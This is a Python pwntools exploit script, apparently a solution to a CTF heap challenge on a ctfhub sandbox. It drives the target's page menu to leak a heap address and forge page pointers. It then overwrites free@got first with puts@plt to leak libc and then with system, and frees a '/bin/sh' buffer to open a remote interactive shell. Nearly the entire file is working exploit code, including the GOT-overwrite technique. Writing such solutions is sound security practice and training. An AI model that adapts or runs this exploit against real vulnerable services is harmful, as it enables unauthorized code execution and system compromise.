from pwn import *
from LibcSearcher import *
# Target setup and thin wrappers around the pwntools tube.
# NOTE: log_level='debug' echoes every byte sent and received (including the
# leaked addresses below) to the console; switch to 'info' for a quiet run.
context(log_level='debug', arch='amd64', os='linux')
pwnfile = "./pwn"
# Hard-coded remote CTF instance; this script has no local/remote switch.
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com", 26124)
elf = ELF(pwnfile)
# Symbol offsets (puts, system) come from this exact libc build; a different
# libc on the target would make the computed base wrong.
libc = ELF("./libc-2.23_64.so")


def s(data):
    """Send ``data`` raw (no newline appended)."""
    return io.send(data)


def sa(delim, data):
    """Wait for ``delim`` on the tube, then send ``data`` raw."""
    return io.sendafter(delim, data)


def sl(data):
    """Send ``data`` followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait for ``delim`` on the tube, then send ``data`` plus newline."""
    return io.sendlineafter(delim, data)


def r(num=4096):
    """Receive up to ``num`` bytes (default 4096)."""
    return io.recv(num)


def ru(delims):
    """Receive until ``delims`` is seen; returns everything up to and including it."""
    return io.recvuntil(delims)


def itr():
    """Hand the tube over to the user (interactive shell)."""
    return io.interactive()


def uu32(data):
    """Unpack up to 4 bytes as little-endian u32, zero-padding short input."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack up to 8 bytes as little-endian u64, zero-padding short input."""
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    """Log ``name = 0x...`` at success level."""
    return log.success('{} = {:#x}'.format(name, addr))


def lg(address, data):
    """Log ``<address>: 0x<data>``.

    Despite the parameter names, ``address`` is the label and ``data`` is the
    number that gets hex-formatted -- the mirror image of leak().
    """
    return log.success('%s: ' % (address) + hex(data))
def add(size):
    """Menu option 1: allocate a new page of ``size`` bytes.

    ``size`` is sent as its decimal string after the "size:" prompt.
    """
    sla(b"Your choice >> \n", b"1")
    sla(b"size:\n", str(size))
def edit(idx, data):
    """Menu option 2: write ``data`` (raw, no trailing newline) into page ``idx``.

    No length field is sent, so how many bytes the binary actually consumes
    is decided on the target side, not here.
    """
    sla(b"Your choice >> \n", b"2")
    sla(b"Which page do you want to edit?", str(idx))
    sa(b"Input your content:", data)
def free(idx):
    """Menu option 3: delete page ``idx``.

    Once free@got has been redirected (see the exploit body) this is the
    call that presumably lands in puts()/system() with the page pointer.
    """
    sla(b"Your choice >> \n", b"3")
    sla(b"Which page do you want to delete?", str(idx))
def name(data):
    """Menu option 4: overwrite the stored name with ``data`` (raw send)."""
    sla(b"Your choice >> \n", b"4")
    sa(b"Your new name:", data)
def message(size, data1, data2):
    """Menu option 5: replace the message, recording the old message's address.

    Side effects:
      * sets the module global ``chunk_0`` to the address the program prints
        after "Your message is saved at ".  Exactly 9 characters are read
        (``0x`` + 7 hex digits); a longer address would be silently
        truncated, so sanity-check the printed value if the exploit misbehaves;
      * reads the module global ``name_addr`` (assigned later in the file,
        before the first call).

    ``data2`` is accepted but never sent: the "say goodbye to the old message"
    prompt is answered with two copies of ``p64(name_addr - 0x10)`` instead.
    Callers currently pass a dummy value.
    """
    global chunk_0
    sla(b"Your choice >> \n", b"5")
    ru(b"Your message is saved at ")
    chunk_0 = int(r(9), 16)
    print("message_chunk---------------->: ", hex(chunk_0))
    sla(b"Your size of new message:", str(size))
    sa(b'Input your new message:', data1)
    # Two identical pointers just below the name buffer.
    fake_ptrs = p64(name_addr - 0x10) * 2
    sa(b"Oh,I'm sorry,maybe you should say goodbye to the old message:", fake_ptrs)
# --- Exploit body ------------------------------------------------------------
# Observable flow: leak a heap address via menu 5 (message), plant pointers to
# the name buffer, then rewrite the page pointers so that free@got can be set
# to puts@plt (libc leak) and afterwards to system, and finally free a page
# that holds "/bin/sh".  The exact heap layout is not visible in this file.
sla(b"Now,please input your name,Mr. writer:", b"aaaa")
sla(b"And write some message for your book?", b"bbbb")
add(0x80)

# Fixed .bss addresses of the (non-PIE) binary.  page_list / message_addr are
# kept for reference only; name_addr is read by message().
page_list = 0x602100
message_addr = 0x6020E0
name_addr = 0x6020A0

# message() stores the printed chunk address in the global chunk_0 and
# answers the "old message" prompt itself; its third argument is ignored.
message(0xee, b"a", b"\x28")
name(p64(chunk_0 - 0x10) * 2)
add(0xb0)
add(0xb0)

free_got = elf.got['free']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

# Presumably page 2's buffer overlaps the page table: after this write page 0
# points at free@got and page 1 at puts@got (inferred from the edit/free
# sequence below -- confirm against the binary's layout).
fake_table = b"a" * 0x60 + p64(free_got) + p64(puts_got)
edit(2, fake_table)
edit(0, p64(puts_plt))   # free@got := puts@plt (via page 0)
free(1)                  # free(page 1) -> puts(puts@got): prints puts' address

ru(b"\n")
# Only 6 bytes are taken -- enough for a 0x7f.. user-space address, but the
# read is not anchored to a prompt; any extra output first corrupts the leak.
puts_addr = uu64(r(6))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
print("libc_base-------------->: ", hex(libc_base))

edit(0, p64(system_addr))  # free@got := system
edit(2, b"/bin/sh\x00")
free(2)                    # free(page 2) -> system("/bin/sh")
itr()